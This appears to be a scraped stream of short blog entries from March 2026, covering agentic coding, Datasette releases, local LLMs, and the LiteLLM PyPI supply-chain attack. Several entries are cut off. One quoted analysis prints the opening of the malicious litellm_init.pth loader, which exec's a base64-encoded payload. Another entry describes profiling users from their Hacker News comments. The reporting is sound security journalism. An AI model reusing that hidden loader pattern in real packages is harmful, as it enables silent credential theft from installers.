<blockquote cite="https://interconnected.org/home/2026/03/28/architecture"><p>The thing about agentic coding is that agents grind problems into dust. Give an agent a problem and a while loop and - long term - it’ll solve that problem even if it means burning a trillion tokens and re-writing down to the silicon. [...]</p><p>But we want AI agents to solve coding problems quickly and in a way that is maintainable and adaptive and composable (benefiting from improvements elsewhere), and where every addition makes the whole stack better.</p><p>So at the bottom is really great libraries that encapsulate hard problems, with great interfaces that make the “right” way the easy way for developers building apps with them. Architecture!</p><p>While I’m vibing (I call it vibing now, not coding and not vibe coding) while I’m vibing, I am looking at lines of code less than ever before, and thinking about architecture more than ever before.</p></blockquote><p class="cite">&mdash; <a href="https://int

<p><strong>Release:</strong> <a href="https://github.com/simonw/datasette-showboat/releases/tag/0.1a2">datasette-showboat 0.1a2</a></p> <p>I added an option to export a Markdown file from my app that lets Showboat <a href="https://simonwillison.net/2026/Feb/17/chartroom-and-datasette-showboat/#showboat-remote-publishing">incrementally publish updates</a> to a remote server.</p>

<blockquote cite="https://github.com/chardet/chardet/issues/334#issuecomment-4098524555"><p>FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...]</p></blockquote><p class="cite">&mdash; <a href="https://github.com/chardet/chardet/issues/334#issuecomment-4098524555">Richard Fontana</a>, LGPLv3 co-author, weighing in on the <a href="https://simonwillison.net/2026/Mar/5/chardet/">chardet relicensing situation</a></p> <p>Tags: <a href="https://simonwillison.net/tags/open-source">open-source</a>, <a href="https://simonwillison.net/tags/ai-ethics">ai-ethics</a>, <a href="https://simonwillison.net/tags/llms">llms</a>, <a href="https://simonwillison.net/tags/ai">ai</a>, <a href="https://simonwillison.

<p>I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be <em>very</em> capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results.</p><p>This is my second experiment with vibe coding macOS apps - the first was <a href="https://simonwillison.net/2026/Feb/25/present/">this presentation app a few weeks ago</a>.</p><p>It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in a single text file, which means I can use them to spin something up without even opening Xcode.</p><p>I’ve built two apps so far: Bandwidther shows me what apps are using network bandwidth and Gpuer to show me what’s going on with the GPU. At Claude’s suggestion both of these are now menu bar icons that open a panel full of information.</p><h4 id="bandwidther">Bandwidther</h4><p>I built this app first, because

<p><strong><a href="https://www.reco.ai/blog/we-rewrote-jsonata-with-ai">We Rewrote JSONata with AI in a Day, Saved $500K/Year</a></strong></p>Bit of a hyperbolic framing but this looks like another case study of <strong>vibe porting</strong>, this time spinning up a new custom Go implementation of the <a href="https://jsonata.org">JSONata</a> JSON expression language - similar in focus to jq, and heavily associated with the <a href="https://nodered.org">Node-RED</a> platform.</p><p>As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.</p><p>The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one. <p>Tags: <a href="https://simonwillison.net/tags/go">go</a>, <a href="https://simonwillison.net/tags/json">json</a>, <a href="https://simonwillison.

<p><strong><a href="https://futuresearch.ai/blog/litellm-attack-transcript/">My minute-by-minute response to the LiteLLM malware attack</a></strong></p>Callum McMahon reported the <a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/">LiteLLM malware attack</a> to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:</p><blockquote><p><strong>Confirmed</strong>. Fresh download from PyPI right now in an isolated Docker container:</p><pre><code>Inspecting: litellm-1.82.8-py3-none-any.whlFOUND: litellm_init.pthSIZE: 34628 bytesFIRST 200 CHARS:import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...</code></pre><p>The malicious <code>litellm==1.82.8</code> is <strong>live on PyPI right now</strong> an

<p><strong><a href="https://ngrok.com/blog/quantization">Quantization from the ground up</a></strong></p>Sam Rose continues <a href="https://simonwillison.net/tags/sam-rose/">his streak</a> of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "<a href="https://twitter.com/samwhoo/status/2036845101561835968">the best post I've ever made</a>".)</p><p>Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.</p><p><img alt="Screenshot of an interactive float32 binary representation tool showing the value -48.92364502, with color-coded bit fields labeled S (sign), EXPONENT (blue), and SIGNIFICAND (pink), displaying the 32-bit pattern 11000010010000111101100001110100000, and a slider control at the bottom along with minus, plus, and reset buttons." src="https://static.simonwillison.net/static/2026/float.jpg" /></p><p>I hadn

<p><strong>Release:</strong> <a href="https://github.com/datasette/datasette-files-s3/releases/tag/0.1a1">datasette-files-s3 0.1a1</a></p> <p>A backend for <a href="https://github.com/datasette/datasette-files">datasette-files</a> that adds the ability to store and retrieve files using an S3 bucket. This release added <a href="https://github.com/datasette/datasette-files-s3/blob/main/README.md#credentials-broker-response">a mechanism</a> for fetching S3 configuration periodically from a URL, which means we can use time limited IAM credentials that are restricted to a prefix within a bucket.</p> <p>Tags: <a href="https://simonwillison.net/tags/s3">s3</a>, <a href="https://simonwillison.net/tags/datasette">datasette</a></p>

<p><strong><a href="https://news.ycombinator.com/item?id=47517539">Thoughts on slowing the fuck down</a></strong></p>Mario Zechner created the <a href="https://github.com/badlogic/pi-mono">Pi agent framework</a> used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed:</p><blockquote><p>We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.</p></blockquote><p>Agents and humans both make mistakes, but agent mistakes accumulate much faster:</p><blockquote><p>A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...]</p><p>With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny littl

<p><strong>Release:</strong> <a href="https://github.com/datasette/datasette-llm/releases/tag/0.1a1">datasette-llm 0.1a1</a></p> <p>New release of the base plugin that makes models from <a href="https://llm.datasette.io/">LLM</a> available for use by other Datasette plugins such as <a href="https://github.com/datasette/datasette-enrichments-llm">datasette-enrichments-llm</a>.</p><blockquote><ul><li>New <a href="https://github.com/datasette/datasette-llm/blob/main/README.md#register_llm_purposes"><code>register_llm_purposes()</code> plugin hook</a> and <code>get_purposes()</code> function for retrieving registered purpose strings. <a href="https://github.com/datasette/datasette-llm/issues/1">#1</a></li></ul></blockquote><p>One of the responsibilities of this plugin is to configure which models are used for which purposes, so you can say in one place "data enrichment uses GPT-5.4-nano but SQL query assistance happens using Sonnet 4.6", for example.</p><p>Plugins that depend on this can

<p><strong><a href="https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/">LiteLLM Hack: Were You One of the 47,000?</a></strong></p>Daniel Hnyk used the <a href="https://console.cloud.google.com/bigquery?p=bigquery-public-data&amp;d=pypi">BigQuery PyPI dataset</a> to determine how many downloads there were of <a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/">the exploited LiteLLM packages</a> during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).</p><p>They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version. <p><small></small>Via <a href="https://twitter.com/hnykda/status/2036834100342825369">@hnykda</a></small></p> <p>Tags: <a href="https://simonwillison.net/tags/packaging">packaging</a>, <a href="https://simonwillison.net/tags/pypi">pypi</a>, <a href="https://simonwillison.

<p><strong><a href="https://claude.com/blog/auto-mode">Auto mode for Claude Code</a></strong></p>Really interesting new development in Claude Code today as an alternative to <code>--dangerously-skip-permissions</code>:</p><blockquote><p>Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run.</p></blockquote><p>Those safeguards appear to be implemented using Claude Sonnet 4.6, as <a href="https://code.claude.com/docs/en/permission-modes#eliminate-prompts-with-auto-mode">described in the documentation</a>:</p><blockquote><p>Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...]</p>

<p><strong><a href="https://nesbitt.io/2026/03/04/package-managers-need-to-cool-down.html">Package Managers Need to Cool Down</a></strong></p>Today's <a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/">LiteLLM supply chain attack</a> inspired me to revisit the idea of <a href="https://simonwillison.net/2025/Nov/21/dependency-cooldowns/">dependency cooldowns</a>, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.</p><p>This recent piece (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including:</p><ul><li><a href="https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates">pnpm 10.16</a> (September 2025) — <code>minimumReleaseAge</code> with <code>

<blockquote cite="https://bsky.app/profile/mims.bsky.social/post/3mhsux67xpk2d"><p>I really think "give AI total control of my computer and therefore my entire life" is going to look so foolish in retrospect that everyone who went for this is going to look as dumb as Jimmy Fallon holding up a picture of his Bored Ape</p></blockquote><p class="cite">&mdash; <a href="https://bsky.app/profile/mims.bsky.social/post/3mhsux67xpk2d">Christopher Mims</a>, Technology columnist at The Wall Street Journal</p> <p>Tags: <a href="https://simonwillison.net/tags/ai">ai</a>, <a href="https://simonwillison.net/tags/security">security</a></p>

<p><strong><a href="https://github.com/BerriAI/litellm/issues/24512">Malicious litellm_init.pth in litellm 1.82.8 — credential stealer</a></strong></p>The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a <code>litellm_init.pth</code> file, which means installing the package is enough to trigger it even without running <code>import litellm</code>.</p><p>(1.82.7 had the exploit as well but it was in the <code>proxy/proxy_server.py</code> file so the package had to be imported for it to take effect.)</p><p>This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit <a href="https://github.com/BerriAI/litellm/issues/24518">over here</a>.</p><p>PyPI has already <a href="https://pypi.org/help/#project_in_quarantine">quarantined</a> the <a href="https://pypi.org/project/litellm/">litellm package</a> so the window for compromise was just a

<p>I wrote about Dan Woods' experiments with <strong>streaming experts</strong> <a href="https://simonwillison.net/2026/Mar/18/llm-in-a-flash/">the other day</a>, the trick where you run larger Mixture-of-Experts models on hardware that doesn't have enough RAM to fit the entire model by instead streaming the necessary expert weights from SSD for each token that you process.</p><p>Five days ago Dan was running Qwen3.5-397B-A17B in 48GB of RAM. Today <a href="https://twitter.com/seikixtc/status/2036246162936910322">@seikixtc reported</a> running the colossal Kimi K2.5 - a 1 trillion parameter model with 32B active weights at any one time, in 96GB of RAM on an M2 Max MacBook Pro.</p><p>And <a href="https://twitter.com/anemll/status/2035901335984611412">@anemll showed</a> that same Qwen3.5-397B-A17B model running on an iPhone, albeit at just 0.6 tokens/second - <a href="https://github.com/Anemll/flash-moe/tree/iOS-App">iOS repo here</a>.</p><p>I think this technique has legs. Dan and his

<blockquote cite="https://bsky.app/profile/schwarzgerat.bsky.social/post/3mhqu5dogos2v"><p>slop is something that takes more human effort to consume than it took to produce. When my coworker sends me raw Gemini output he’s not expressing his freedom to create, he’s disrespecting the value of my time</p></blockquote><p class="cite">&mdash; <a href="https://bsky.app/profile/schwarzgerat.bsky.social/post/3mhqu5dogos2v">Neurotica</a>, @schwarzgerat.bsky.social</p> <p>Tags: <a href="https://simonwillison.net/tags/ai-ethics">ai-ethics</a>, <a href="https://simonwillison.net/tags/slop">slop</a>, <a href="https://simonwillison.net/tags/generative-ai">generative-ai</a>, <a href="https://simonwillison.net/tags/ai">ai</a>, <a href="https://simonwillison.net/tags/llms">llms</a></p>

<p><strong>Release:</strong> <a href="https://github.com/datasette/datasette-files/releases/tag/0.1a2">datasette-files 0.1a2</a></p> <p>The most interesting alpha of <a href="https://github.com/datasette/datasette-files">datasette-files</a> yet, a new plugin which adds the ability to upload files directly into a Datasette instance. Here are the release notes in full:</p><blockquote><ul><li>Columns are now configured using the <a href="https://docs.datasette.io/en/latest/changelog.html#new-column-types-system">new column_types system</a> from Datasette 1.0a26. <a href="https://github.com/datasette/datasette-files/issues/8">#8</a></li><li>New <code>file_actions</code> plugin hook, plus ability to import an uploaded CSV/TSV file to a table. <a href="https://github.com/datasette/datasette-files/issues/10">#10</a></li><li>UI for uploading multiple files at once via the new documented JSON upload API. <a href="https://github.com/datasette/datasette-files/issues/11">#11</a></li><li>Thumbnail

<blockquote cite="https://www.davidabram.dev/musings/the-machine-didnt-take-your-craft/"><p>I have been doing this for years, and the hardest parts of the job were never about typing out code. I have always struggled most with understanding systems, debugging things that made no sense, designing architectures that wouldn't collapse under heavy load, and making decisions that would save months of pain later.</p><p>None of these problems can be solved LLMs. They can suggest code, help with boilerplate, sometimes can act as a sounding board. But they don't understand the system, they don't carry context in their "minds", and they certianly don't know why a decision is right or wrong.</p><p>And the most importantly, they don't choose. That part is still yours. The real work of software development, the part that makes someone valuable, is knowing what should exist in the first place, and why.</p></blockquote><p class="cite">&mdash; <a href="https://www.davidabram.dev/musings/the-machine-d

<p>Last month I <a href="https://simonwillison.net/2026/Feb/20/beats/">added a feature I call beats</a> to this blog, pulling in some of my other content from <a href="https://simonwillison.net/elsewhere/">external sources</a> and including it on the homepage, search and various archive pages on the site.</p><p>On any given day these frequently outnumber my regular posts. They were looking a little bit thin and were lacking any form of explanation beyond a link, so I've added the ability to annotate them with a "note" which now shows up as part of their display.</p><p>Here's what that looks like <a href="https://simonwillison.net/2026/Mar/22/">for the content I published yesterday</a>:</p><p><img class="blogmark-image" style="width:80%" src="https://static.simonwillison.net/static/2026/beats-notes.jpg" alt="Screenshot of part of my blog homepage showing four &quot;beats&quot; entries from March 22, 2026, each tagged as RESEARCH or TOOL, with titles like &quot;PCGamer Article Performan

<p><strong>Research:</strong> <a href="https://github.com/simonw/research/tree/main/starlette-1-skill#readme">Starlette 1.0 skill</a></p> <p>See <a href="https://simonwillison.net/2026/Mar/22/starlette/">Experimenting with Starlette 1.0 with Claude skills</a>.</p> <p>Tags: <a href="https://simonwillison.net/tags/starlette">starlette</a></p>

<p><a href="https://marcelotryle.com/blog/2026/03/22/starlette-10-is-here/">Starlette 1.0 is out</a>! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of <a href="https://fastapi.tiangolo.com/">FastAPI</a>, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself.</p><p>Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own <a href="https://datasette.io/">Datasette</a> project was that it didn't yet promise stability, and I was determined to provide a stable API for Datasette's own plugins... albeit I still haven't been brave enough to ship my own 1.0 release (after 26 alphas and counting)!</p><p>Then in September 2025 Marcelo Trylesinski <a href="https://github.com/Kludex/starlette/discussions

<p><strong>Research:</strong> <a href="https://github.com/simonw/research/tree/main/pcgamer-audit#readme">PCGamer Article Performance Audit</a></p> <p>Stuart Breckenridge pointed out that <a href="https://stuartbreckenridge.net/2026-03-19-pc-gamer-recommends-rss-readers-in-a-37mb-article/">PC Gamer Recommends RSS Readers in a 37MB Article That Just Keeps Downloading</a>, highlighting a truly horrifying example of web bloat that added up to 100s more MBs thanks to auto-playing video ads. I decided to have Claude Code for web use <a href="https://github.com/simonw/rodney/">Rodney</a> to investigate the page - <a href="https://github.com/simonw/research/pull/101#issue-4117308562">prompt here</a>.</p> <p>Tags: <a href="https://simonwillison.net/tags/web-performance">web-performance</a>, <a href="https://simonwillison.net/tags/rodney">rodney</a></p>

<p><strong>Research:</strong> <a href="https://github.com/simonw/research/tree/main/javascript-sandboxing-research#readme">JavaScript Sandboxing Research</a></p> <p>Aaron Harper <a href="https://www.inngest.com/blog/node-worker-threads">wrote about Node.js worker threads</a>, which inspired me to run a research task to see if they might help with running JavaScript in a sandbox. Claude Code went way beyond my initial question and produced a comparison of <a href="https://github.com/laverdet/isolated-vm">isolated-vm</a>, <a href="https://github.com/patriksimek/vm2">vm2</a>, <a href="https://github.com/justjake/quickjs-emscripten">quickjs-emscripten</a>, <a href="https://github.com/quickjs-ng/quickjs">QuickJS-NG</a>, <a href="https://github.com/tc39/proposal-shadowrealm">ShadowRealm</a>, and <a href="https://docs.deno.com/runtime/manual/runtime/workers/">Deno Workers</a>.</p> <p>Tags: <a href="https://simonwillison.net/tags/sandboxing">sandboxing</a>, <a href="https://simonwillison.net/

<p><strong>Tool:</strong> <a href="https://tools.simonwillison.net/dns">DNS Lookup</a></p> <p>TIL that Cloudflare's 1.1.1.1 DNS service (and 1.1.1.2 and 1.1.1.3, which block malware and malware + adult content respectively) has a CORS-enabled JSON API, so I <a href="https://github.com/simonw/tools/pull/258#issue-4116864108">had Claude Code build me</a> a UI for running DNS queries against all three of those resolvers.</p> <p>Tags: <a href="https://simonwillison.net/tags/dns">dns</a>, <a href="https://simonwillison.net/tags/cors">cors</a>, <a href="https://simonwillison.net/tags/cloudflare">cloudflare</a></p>

<p><strong>Tool:</strong> <a href="https://tools.simonwillison.net/manyana">Merge State Visualizer</a></p> <p>Bram Cohen wrote about his <a href="https://bramcohen.com/p/manyana">coherent vision for the future of version control</a> using CRDTs, illustrated by <a href="https://github.com/bramcohen/manyana/blob/main/manyana.py">470 lines of Python</a>.</p><p>I fed that Python (minus comments) into Claude and asked for <a href="https://claude.ai/share/8ce777cd-c7c3-4656-a45e-acbf66bf994b">an explanation</a>, then had it use Pyodide to build me an interactive UI for seeing how the algorithms work.</p> <p>Tags: <a href="https://simonwillison.net/tags/vcs">vcs</a>, <a href="https://simonwillison.net/tags/pyodide">pyodide</a>, <a href="https://simonwillison.net/tags/bram-cohen">bram-cohen</a>, <a href="https://simonwillison.net/tags/crdt">crdt</a></p>

<p>Here's a mildly dystopian prompt I've been experimenting with recently: "Profile this user", accompanied by a copy of their last 1,000 comments on Hacker News.</p><p>Obtaining those comments is easy. The <a href="https://hn.algolia.com/api">Algolia Hacker News API</a> supports listing comments sorted by date that have a specific tag, and the author of a comment is tagged there as <code>author_username</code>. Here's a JSON feed of my (<code>simonw</code>) most recent comments, for example:</p><p><a href="https://hn.algolia.com/api/v1/search_by_date?tags=comment,author_simonw&amp;hitsPerPage=1000">https://hn.algolia.com/api/v1/search_by_date?tags=comment,author_simonw&amp;hitsPerPage=1000</a></p><p>The Algolia API is served with open CORS headers, which means you can access the API from JavaScript running on any web page.</p><p>Last August I <a href="https://chatgpt.com/share/68a4d2b1-a678-8006-aca0-cec51b243bd3">had ChatGPT build me</a> a <a href="https://tools.simonwillison.net/hn

<p><em><a href="https://simonwillison.net/guides/agentic-engineering-patterns/">Agentic Engineering Patterns</a> &gt;</em></p> <p>Git is a key tool for working with coding agents. Keeping code in version control lets us record how that code changes over time and investigate and reverse any mistakes. All of the coding agents are fluent in using Git's features, both basic and advanced.</p><p>This fluency means we can be more ambitious about how we use Git ourselves. We don't need to memorize <em>how</em> to do things with Git, but staying aware of what's possible means we can take advantage of the full suite of Git's abilities.</p><h2 id="git-essentials">Git essentials</h2><p>Each Git project lives in a <strong>repository</strong> - a folder on disk that can track changes made to the files within it. Those changes are recorded in <strong>commits</strong> - timestamped bundles of changes to one or more files accompanied by a <strong>commit message</strong> describing those changes and an

<p><strong><a href="https://tools.simonwillison.net/turbo-pascal-deconstructed">Turbo Pascal 3.02A, deconstructed</a></strong></p>In <a href="https://prog21.dadgum.com/116.html">Things That Turbo Pascal is Smaller Than</a> James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.</p><p>This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.</p><p>It did a great job, so I had it create <a href="https://tools.simonwillison.net/turbo-pascal-deconstructed">this interactive artifact</a> illustrating the result. Here's the <a href="https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e">sequence of prompts</a> I used (in regular <a href="https://claude.ai/">claude.ai</a> chat, not Claude Code):</p><blockquote><p>Read this https://prog21.dadgum.

<blockquote cite="https://twitter.com/Kimi_Moonshot/status/2035074972943831491"><p>Congrats to the <a href="https://x.com/cursor_ai">@cursor_ai</a> team on the launch of Composer 2!</p><p>We are proud to see Kimi-k2.5 provide the foundation. Seeing our model integrated effectively through Cursor's continued pretraining &amp; high-compute RL training is the open model ecosystem we love to support.</p><p>Note: Cursor accesses Kimi-k2.5 via <a href="https://x.com/FireworksAI_HQ">@FireworksAI_HQ</a> hosted RL and inference platform as part of an authorized commercial partnership.</p></blockquote><p class="cite">&mdash; <a href="https://twitter.com/Kimi_Moonshot/status/2035074972943831491">Kimi.ai @Kimi_Moonshot</a>, responding to reports that Composer 2 was built on top of Kimi K2.5</p> <p>Tags: <a href="https://simonwillison.net/tags/kimi">kimi</a>, <a href="https://simonwillison.net/tags/generative-ai">generative-ai</a>, <a href="https://simonwillison.net/tags/ai">ai</a>, <a href="https